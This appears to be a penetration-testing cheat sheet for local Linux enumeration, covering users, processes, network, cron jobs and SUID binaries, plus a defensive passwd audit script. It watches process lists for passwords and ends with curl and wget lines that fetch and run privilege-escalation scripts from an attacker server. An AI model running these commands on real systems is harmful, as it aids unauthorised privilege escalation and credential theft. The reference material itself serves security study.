Local Enumeration

Users

Enumerate the current user ID (UID), group ID (GID), and the groups the user belongs to.

id
uid=1001(john) gid=1001(john) groups=1001(john),27(sudo) # john's result

Enumerate basic information about all users using /etc/passwd.

cat /etc/passwd

The following example shows one line of the /etc/passwd file and the layout of its fields.

john:x:1001:1001:John Doe:/home/john:/bin/bash
username:password:uid:gid:gecos:home directory:shell

  • Username: The login name (1-32 characters).

  • Password: An x means the password is stored in /etc/shadow.

  • User ID (UID): Unique ID for the user. UID 0 is for root, 1-99 are reserved, and 100-999 are for system accounts.

  • Group ID (GID): The primary group ID, found in /etc/group.

  • User Info (GECOS): Optional user information like full name or contact info.

  • Home Directory: The user's default directory when logging in.

  • Shell: The user's default shell, like /bin/bash, or /sbin/nologin to prevent login.
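As an added example (not part of the original notes), the following script parses /etc/passwd records using the seven-field layout above and flags entries a reviewer would want to check: extra UID 0 accounts, shared UIDs, empty password fields, and system accounts with an interactive shell. The records in SAMPLE_PASSWD are constructed for illustration; point parse_passwd at the real file contents to audit a host.

```python
# Added example: parse /etc/passwd records (username:password:uid:gid:gecos:home:shell)
# and flag entries worth a closer look. SAMPLE_PASSWD is constructed sample data.
from collections import Counter

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
john:x:1001:1001:John Doe:/home/john:/bin/bash
backup:x:34:34:backup:/var/backups:/bin/sh
toor:x:0:0:second root:/root:/bin/bash
legacy::1002:1002:no password set:/home/legacy:/bin/bash
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def parse_passwd(text):
    """Split each record into its seven fields; skip blank, comment or malformed lines."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed record; skip rather than guess
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "password": pw, "uid": int(uid),
                        "gid": int(gid), "gecos": gecos, "home": home,
                        "shell": shell})
    return entries


def audit_passwd(entries):
    """Return (username, reason) pairs for records that deserve review."""
    findings = []
    uid_counts = Counter(e["uid"] for e in entries)
    for e in entries:
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], "uid 0 but not root"))
        if uid_counts[e["uid"]] > 1:
            findings.append((e["name"], "uid shared with another account"))
        if e["password"] == "":
            findings.append((e["name"], "empty password field"))
        if 1 <= e["uid"] <= 999 and e["shell"] not in NOLOGIN_SHELLS:
            findings.append((e["name"], "system account with a login shell"))
    return findings


if __name__ == "__main__":
    for user, reason in audit_passwd(parse_passwd(SAMPLE_PASSWD)):
        print(f"{user}: {reason}")
```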

System information

Enumerate hostname.

hostname

Enumerate operating system version.

cat /etc/issue
cat /etc/os-release

Enumerate kernel version and architecture.

uname -a

User configurations

List the sudo privileges of the current user.

sudo -l

List environment variables.

env

List configuration files, such as the bash profile, in the user's home directory.

ls -la <home_directory>

Processes

Enumerate all processes in a user-readable format.

ps aux

Monitor processes (this example re-runs ps every second and filters for "pass").

watch -n 1 "ps -aux | grep pass"

It is also possible to monitor running processes live using the pspy tool.

Network

Enumerate all network interfaces; this includes physical and virtual interfaces.

ip a
ifconfig

Display the routing tables.

route

Enumerate connections.

ss -anp
netstat -tulnp

Enumerate firewall rules.

cat /etc/iptables/rules.v4

Scheduled tasks

Scheduled tasks in Linux are also known as "cron jobs" and are configured using the crontab command-line tool.

Crontab Files

  • User-specific crontabs: Stored separately for each user and managed by the crontab command.

  • System-wide crontab: Found in /etc/crontab. This file allows specifying jobs for different users.

  • Cron directories:

    • /etc/cron.hourly: Tasks that run every hour.

    • /etc/cron.daily: Tasks that run daily.

    • /etc/cron.weekly: Tasks that run weekly.

    • /etc/cron.monthly: Tasks that run monthly.

List the cron task files.

ls -lah /etc/cron*

Find tasks in the system logs.

grep "CRON" /var/log/syslog

Enumerate the current user's scheduled jobs.

crontab -l

Application

List installed packages (dpkg is used on Debian-based systems).

dpkg -l

File System

List the file systems mounted at boot time.

cat /etc/fstab

List all mounted file systems.

mount

List all available block devices.

lsblk

Enumerate loaded Kernel modules.

lsmod

Gather more information about a specific kernel module.

/sbin/modinfo <module>

SUID Binaries

Enumerate SUID binaries.

find / -perm /4000 -type f 2>/dev/null

Automated Enumeration

Download and execute LinPEAS or unix-privesc-check:

# LinPEAS
curl -L http://<attacker_http_server>/linpeas.sh | bash 

# unix-privesc-check
wget http://<attacker_http_server>/unix-privesc-check && chmod +x unix-privesc-check && ./unix-privesc-check <standard | detailed> 
